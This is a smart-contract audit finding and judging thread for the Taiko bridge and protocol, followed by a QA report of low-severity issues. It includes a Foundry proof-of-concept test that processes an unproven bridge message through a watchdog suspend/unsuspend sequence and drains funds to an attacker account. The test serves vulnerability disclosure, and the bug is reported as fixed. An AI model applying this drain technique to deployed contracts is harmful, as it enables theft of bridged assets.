Paste the below code into Bridge.t.sol and run forge test --match-test testWatchdogDrain -vvv.
function testWatchdogDrain() public {
    uint256 balanceBefore = Bob.balance;

    IBridge.Message memory message = IBridge.Message({
        id: 0,
        from: address(bridge),
        srcChainId: uint64(block.chainid),
        destChainId: destChainId,
        srcOwner: Alice,
        destOwner: Alice,
        to: Bob,
        refundTo: Alice,
        value: 10 ether,
        fee: 1,
        gasLimit: 1_000_000,
        data: "",
        memo: ""
    });

    bytes memory proof = hex"00";

    bytes32 msgHash = destChainBridge.hashMessage(message);
    bytes32[] memory msgHashA = new bytes32[](1);
    msgHashA[0] = msgHash;

    vm.prank(Alice);
    destChainBridge.suspendMessages(msgHashA, true);

    vm.prank(Alice);
    destChainBridge.suspendMessages(msgHashA, false);

    vm.chainId(destChainId);
    vm.prank(Bob, Bob);
    destChainBridge.processMessage(message, proof);

    IBridge.Status status = destChainBridge.messageStatus(msgHash);
    assertEq(status == IBridge.Status.DONE, true);

    console2.log("Bobs Stolen funds", Bob.balance - balanceBefore);
    console2.log("We have successfully processed a message without actually proving it!");
}
foundry, vscode
Un-suspended messages should be set to 0 and be proven or re-proven.
function suspendMessages(
    bytes32[] calldata _msgHashes,
    bool _suspend
)
    external
    onlyFromOwnerOrNamed("bridge_watchdog")
{
+   uint64 _timestamp = _suspend ? type(uint64).max : 0;
    for (uint256 i; i < _msgHashes.length; ++i) {
        bytes32 msgHash = _msgHashes[i];
        proofReceipt[msgHash].receivedAt = _timestamp;
        emit MessageSuspended(msgHash, _suspend);
    }
}
Other
#0 - c4-pre-sort
2024-03-28T19:14:39Z
minhquanym marked the issue as primary issue
#1 - c4-pre-sort
2024-03-28T19:15:00Z
minhquanym marked the issue as sufficient quality report
#2 - c4-sponsor
2024-04-02T03:59:44Z
dantaik (sponsor) confirmed
#3 - dantaik
2024-04-02T04:03:55Z
This is a valid bug report. The bug has been fixed in this PR: https://github.com/taikoxyz/taiko-mono/pull/16545
#4 - 0xean
2024-04-09T13:03:50Z
Good report, but I am not sure it qualifies as H severity and most likely should be M.
I think there is a pre-condition here ( a malicious watchdog).
2 — Med: Assets not at direct risk, but the function of the protocol or its availability could be impacted, or leak value with a hypothetical attack path with stated assumptions, but external requirements.
would welcome more conversation during PJ-QA
#5 - c4-judge
2024-04-09T13:04:09Z
0xean changed the severity to 2 (Med Risk)
#6 - c4-judge
2024-04-09T18:31:46Z
0xean marked the issue as satisfactory
#7 - c4-judge
2024-04-10T11:34:41Z
0xean marked the issue as selected for report
#8 - t0x1cC0de
2024-04-10T17:38:01Z
Hey @0xean, Thanks for the review. Commenting here as the owner of #47. It's not only about:
I think there is a pre-condition here ( a malicious watchdog).
It's also about the fact that the watchdog has no way to safely suspend & unsuspend an unproven message, as described in my report.
Not sure if that qualifies this and #47 to be upgraded to High or not, but thought it was important to highlight the fact.
Thanks!
#9 - 0jovi0
2024-04-11T01:24:45Z
Hey @0xean,
As the bridge watchdog is considered a trusted role, I believe this issue should be categorized as QA.
As per C4's Severity Categorization: "Mistakes in code only unblocked through admin mistakes should be submitted within a QA Report."
Thank you!
#10 - mcgrathcoutinho
2024-04-11T03:30:00Z
Hi @0xean, I believe this issue should be of QA-severity.
Overall, I believe this issue and its duplicates serve QA at best.
Thank you for your time!
#11 - t0x1cC0de
2024-04-11T04:11:31Z
- The watchdog though only suspends messages if they were relayed (see relayer docs here). This automatically defies attack scenario 1. The attack is only possible if the watchdog unsuspends a fake message, which it won't since it's fake.
I believe we are mixing "relayed message" with a "message signal not yet to be received". #47 does not intend to assume a wrong input by watchdog or a malicious one. I believe therefore that #47 stands valid on its own. But it would certainly be very helpful to have the sponsor's technical insight on this before supplying any further arguments from my side.
#12 - mcgrathcoutinho
2024-04-11T04:23:48Z
I believe we are mixing "relayed message" with a "message signal not yet to be received"
Why would the watchdog suspend a message that was never relayed/signalled/created from the source chain though? I've linked the docs for that exact reason since it clearly cites how the watchdog suspends messages i.e. only after confirming the source.
#13 - 0xmonrel
2024-04-11T06:50:03Z
Privilege escalation issues are uncapped according to C4 docs and can be both MED and HIGH.
Privilege escalation issues are judged by likelihood and impact and their severity is uncapped.
The bridge watchdog is supposed to only be able to suspend and ban. The worst case is supposed to be a brief DOS until the watchdog is removed; instead they are able to drain the bridge.
Severity is clearly High. Likelihood is hard to assess. What we can see from the code is that Taiko has designed the system to be minimally centralized: trusted roles have limited scope and upgrades have to go through the governance system. This vulnerability bypasses all of that and gives a single role the ability to drain all assets.
#14 - 0xean
2024-04-11T09:54:06Z
Agree that if this attack is feasible, it represents privilege escalation.
as pointed out previously:
Privilege escalation issues are judged by likelihood and impact and their severity is uncapped.
Would be useful to get one final comment from @dontonka / @adaki2004 but most likely will leave as judged.
#16 - dontonka
2024-04-11T12:12:33Z
tagged my mistake also on this issue 😅. @dantaik
#17 - adaki2004
2024-04-11T12:12:47Z
Agree that if this attack is feasible, it represents privilege escalation.
as pointed out previously:
Privilege escalation issues are judged by likelihood and impact and their severity is uncapped.
Would be useful to get one final comment from @dontonka / @adaki2004 but most likely will leave as judged.
Judged.
#18 - 0xean
2024-04-11T13:25:22Z
tagged my mistake also on this issue 😅. @dantaik
sorry about that
1237.1813 USDC - $1,237.18
Judge has assessed an item in Issue #329 as 2 risk. The relevant finding follows:
L-4
#0 - c4-judge
2024-04-10T10:38:49Z
0xean marked the issue as duplicate of #274
#1 - c4-judge
2024-04-10T11:57:48Z
0xean marked the issue as satisfactory
🌟 Selected for report: MrPotatoMagic
Also found by: 0x11singh99, DadeKuma, Fassi_Security, JCK, Kalyan-Singh, Masamune, Myd, Pechenite, Sathish9098, Shield, albahaca, alexfilippov314, cheatc0d3, clara, foxb868, grearlake, hihen, imare, joaovwfreire, josephdara, ladboy233, monrel, n1punp, oualidpro, pa6kuda, pfapostol, rjs, slvDev, sxima, t0x1c, t4sk, zabihullahazadzoi
33.5408 USDC - $33.54
If _message.from has not implemented the IRecallableSender interface when recallMessage() is called, the recall will default to only sending the available ETH.
if (block.timestamp >= invocationDelay + receivedAt) {
    delete proofReceipt[msgHash];
    messageStatus[msgHash] = Status.RECALLED;

    // Execute the recall logic based on the contract's support for the
    // IRecallableSender interface
    if (_message.from.supportsInterface(type(IRecallableSender).interfaceId)) {
        _storeContext(msgHash, address(this), _message.srcChainId);

        // Perform recall
        IRecallableSender(_message.from).onMessageRecalled{ value: _message.value }(
            _message, msgHash
        );

        // Must reset the context after the message call
        _resetContext();
    } else {
        _message.srcOwner.sendEther(_message.value);
    }
A user could prevent this from happening by implementing the interface before recallMessage() is called, and by doing so recover the intended message. Restricting recallMessage() so that only message.from can call it would allow for this.
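As a sketch of the mitigation from the sender's side, a contract could implement the IRecallableSender interface quoted above so that a recall forwards the full message context back to it instead of falling back to a plain ETH transfer. The IBridge.Message type and recovery logic below are assumptions based on the quoted bridge code:

```solidity
// Hypothetical sketch: a sender contract that advertises IRecallableSender
// via ERC-165 so the bridge's recall path calls onMessageRecalled rather
// than only sending ETH to _message.srcOwner.
contract RecallAwareSender is IERC165 {
    function onMessageRecalled(
        IBridge.Message calldata _message,
        bytes32 _msgHash
    )
        external
        payable
    {
        // Custom recovery logic for the recalled message goes here,
        // e.g. re-crediting the original depositor with the bridged value.
    }

    function supportsInterface(bytes4 _id) external pure returns (bool) {
        return _id == type(IRecallableSender).interfaceId
            || _id == type(IERC165).interfaceId;
    }
}
```

Deploying such an implementation before recallMessage() executes is what allows the sender to recover the intended message rather than just the ETH.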
If it were possible to set a designated relayer, guaranteed to be the only one able to call processMessage() for a period of time, we could possibly decrease the bridging fee, since relayers would no longer have to compete and bid against each other to be the first to call processMessage().
The designated relayer would have an a priori guarantee of receiving the fee and would therefore not have to pay to be the first to call processMessage().
When blobs are re-used, the prover could end up committing to a large number of different blocks if they are not careful with their assignments:
if (meta_.blobUsed) {
    if (!_config.blobAllowedForDA) revert L1_BLOB_FOR_DA_DISABLED();

    if (params.blobHash != 0) {
        if (!_config.blobReuseEnabled) revert L1_BLOB_REUSE_DISABLED();

        // We try to reuse an old blob
        if (!isBlobReusable(_state, _config, params.blobHash)) {
            revert L1_BLOB_NOT_REUSABLE();
        }
        meta_.blobHash = params.blobHash;
    } else {
        // Always use the first blob in this transaction. If the
        // proposeBlock functions are called more than once in the same
        // L1 transaction, these multiple L2 blocks will share the same
        // blob.
        meta_.blobHash = blobhash(0);
        if (meta_.blobHash == 0) revert L1_BLOB_NOT_FOUND();

        // Depends on the blob data price, it may not make sense to
        // cache the blob which costs 20,000 (sstore) + 631 (event)
        // extra gas.
        if (_config.blobReuseEnabled && params.cacheBlobForReuse) {
            _state.reusableBlobs[meta_.blobHash] = block.timestamp;
            emit BlobCached(meta_.blobHash);
        }
    }

    // Check that the txList data range is within the max size of a blob
    if (uint256(params.txListByteOffset) + params.txListByteSize > MAX_BYTES_PER_BLOB) {
        revert L1_TXLIST_OFFSET();
    }

    meta_.txListByteOffset = params.txListByteOffset;
    meta_.txListByteSize = params.txListByteSize;
If the prover does not specify the metaHash and parentHash, and sets loose boundaries on maxBlockId and maxProposedIn:
block.timestamp > assignment.expiry
    || assignment.metaHash != 0 && _blk.metaHash != assignment.metaHash
    || assignment.parentMetaHash != 0 && _meta.parentMetaHash != assignment.parentMetaHash
    || assignment.maxBlockId != 0 && _meta.id > assignment.maxBlockId
    || assignment.maxProposedIn != 0 && block.number > assignment.maxProposedIn
they can end up committing to multiple blocks containing any subset of the transactions in the blob.
When proposing, _isProposerPermitted() is called to check whether the proposer is permitted:
function _isProposerPermitted(
    TaikoData.SlotB memory _slotB,
    IAddressResolver _resolver
)
    private
    view
    returns (bool)
{
    if (_slotB.numBlocks == 1) {
        // Only proposer_one can propose the first block after genesis
        address proposerOne = _resolver.resolve("proposer_one", true);
        if (proposerOne != address(0) && msg.sender != proposerOne) {
            return false;
        }
    }

    address proposer = _resolver.resolve("proposer", true);
    return proposer == address(0) || msg.sender == proposer;
}
The second validation is unnecessary and could revert the call. For the first block, we should not additionally require msg.sender == proposer when msg.sender == proposerOne; the two addresses could differ, which would make the call revert.
  if (_slotB.numBlocks == 1) {
      // Only proposer_one can propose the first block after genesis
      address proposerOne = _resolver.resolve("proposer_one", true);
+     if (msg.sender == proposerOne) { return true; }
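Applied to the full function, the patched version could look like the sketch below. The early return for proposer_one is the only behavioral change; the follow-up check is restructured but equivalent to the original:

```solidity
// Sketch of _isProposerPermitted with the proposer_one early return applied.
function _isProposerPermitted(
    TaikoData.SlotB memory _slotB,
    IAddressResolver _resolver
)
    private
    view
    returns (bool)
{
    if (_slotB.numBlocks == 1) {
        // Only proposer_one can propose the first block after genesis.
        address proposerOne = _resolver.resolve("proposer_one", true);
        // Accept proposer_one directly instead of falling through to the
        // generic "proposer" check, which may resolve to a different address.
        if (msg.sender == proposerOne) return true;
        if (proposerOne != address(0)) return false;
    }

    address proposer = _resolver.resolve("proposer", true);
    return proposer == address(0) || msg.sender == proposer;
}
```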
If a guardian discovers that they have signed an incorrect hash, or if a key has been stolen, it would add extra security if a guardian could un-approve a previously approved hash.
function approve(
    TaikoData.BlockMetadata calldata _meta,
    TaikoData.Transition calldata _tran,
    TaikoData.TierProof calldata _proof
)
    external
    whenNotPaused
    nonReentrant
    returns (bool approved_)
{
    if (_proof.tier != LibTiers.TIER_GUARDIAN) revert INVALID_PROOF();

    bytes32 hash = keccak256(abi.encode(_meta, _tran));
    approved_ = approve(_meta.id, hash);

    if (approved_) {
        deleteApproval(hash);
        ITaikoL1(resolve("taiko", false)).proveBlock(_meta.id, abi.encode(_meta, _tran, _proof));
    }

    emit GuardianApproval(msg.sender, _meta.id, _tran.blockHash, approved_);
}
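A minimal sketch of such an un-approve function follows. The guardian-id mapping, approval bitmap, errors, and event below are hypothetical names chosen for illustration; they are not taken from the contest codebase:

```solidity
// Hypothetical addition to the guardian contract: lets a guardian withdraw
// their own prior approval for a given hash before the approval threshold
// is reached, e.g. after discovering a signing mistake or a stolen key.
function unapprove(bytes32 _hash) external {
    uint256 id = guardianIds[msg.sender];
    if (id == 0) revert INVALID_GUARDIAN();

    uint256 approval = _approvals[_hash];
    uint256 bit = 1 << (id - 1);
    if (approval & bit == 0) revert NOT_APPROVED();

    // Clear this guardian's bit so their approval no longer counts
    // toward the threshold.
    _approvals[_hash] = approval & ~bit;
    emit GuardianUnapproval(msg.sender, _hash);
}
```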
When granting, _validateGrant() is called, where we validate that the grant and unlock parameters are valid:
function _validateGrant(Grant memory _grant) private pure {
    if (_grant.amount == 0) revert INVALID_GRANT();
    _validateCliff(_grant.grantStart, _grant.grantCliff, _grant.grantPeriod);
    _validateCliff(_grant.unlockStart, _grant.unlockCliff, _grant.unlockPeriod);
We do not validate between the grant and the unlock. E.g. an unlock whose cliff ends before the grant starts makes no sense and is a sign that the wrong parameters have been entered.
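One possible cross-check is sketched below, reverting when the unlock schedule fully finishes before the grant even starts. The field names follow the quoted code; the added check itself is hypothetical:

```solidity
// Sketch: _validateGrant extended with a grant/unlock cross-validation.
function _validateGrant(Grant memory _grant) private pure {
    if (_grant.amount == 0) revert INVALID_GRANT();
    _validateCliff(_grant.grantStart, _grant.grantCliff, _grant.grantPeriod);
    _validateCliff(_grant.unlockStart, _grant.unlockCliff, _grant.unlockPeriod);

    // Hypothetical cross-validation: an unlock that completes before the
    // grant starts is a strong sign of mis-entered parameters.
    if (_grant.unlockStart + _grant.unlockPeriod < _grant.grantStart) {
        revert INVALID_GRANT();
    }
}
```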
Provers and proposers will create their own hooks, and some of those hooks could interfere with each other.
An example of such a hook would be one that relies on swapping on a DEX to acquire TKO directly in the hook. The prover could allow the proposer to pass in arbitrary data to swap on any DEX. The prover relies entirely on the check after the hook has executed to guarantee that the correct amount of TKO has been transferred:
if (tko.balanceOf(address(this)) != tkoBalance + _config.livenessBond) {
    revert L1_LIVENESS_BOND_NOT_RECEIVED();
A proposer could potentially call two such hooks, each safe in isolation, to steal funds from the prover.
The proposer calls both AssignmentHooks in the loop:
for (uint256 i; i < params.hookCalls.length; ++i) {
    if (uint160(prevHook) >= uint160(params.hookCalls[i].hook)) {
        revert L1_INVALID_HOOK();
    }

    // When a hook is called, all ether in this contract will be send to the hook.
    // If the ether sent to the hook is not used entirely, the hook shall send the Ether
    // back to this contract for the next hook to use.
    // Proposers shall choose use extra hooks wisely.
    IHook(params.hookCalls[i].hook).onBlockProposed{ value: address(this).balance }(
        blk, meta_, params.hookCalls[i].data
    );

    prevHook = params.hookCalls[i].hook;
}

// Refund Ether
if (address(this).balance != 0) {
    msg.sender.sendEther(address(this).balance);
}

// Check that after hooks, the Taiko Token balance of this contract
// have increased by the same amount as _config.livenessBond (to prevent)
// multiple draining payments by a malicious proposer nesting the same
// hook.
if (tko.balanceOf(address(this)) != tkoBalance + _config.livenessBond) {
    revert L1_LIVENESS_BOND_NOT_RECEIVED();
}
Example:
AssignmentHook and DexAssignmentHook are both safe in isolation, but when combined they can be used to steal funds from the prover.
This of course also requires that the prover is actively using both AssignmentHooks and that there is some overlap in the signed assignments such that both are valid at the same time.
We can protect against this by passing the entire hook array when calling
IHook(params.hookCalls[i].hook).onBlockProposed{ value: address(this).balance }(
    blk, meta_, params.hookCalls[i].data
)
By doing so, each AssignmentHook can add assignments to its signature that enforce a specific execution of hooks.
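A sketch of this mitigation is below. The extended interface name and parameter are hypothetical; only the existing (blk, meta_, data) arguments come from the quoted code:

```solidity
// Hypothetical variant of IHook where each hook also receives the full
// list of hooks being executed for this proposal. A hook can then hash
// _allHooks into the assignment it verifies, so a prover's signature
// commits to the exact hook sequence and cannot be combined with an
// unexpected second hook.
interface IHookV2 {
    function onBlockProposed(
        TaikoData.Block calldata _blk,
        TaikoData.BlockMetadata calldata _meta,
        TaikoData.HookCall[] calldata _allHooks, // full hook array
        bytes calldata _data
    )
        external
        payable;
}
```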
#0 - c4-pre-sort
2024-03-30T16:27:41Z
minhquanym marked the issue as sufficient quality report
#1 - minhquanym
2024-03-30T16:27:51Z
L-4 is dup of #274
#2 - c4-judge
2024-04-10T10:38:39Z
0xean marked the issue as grade-b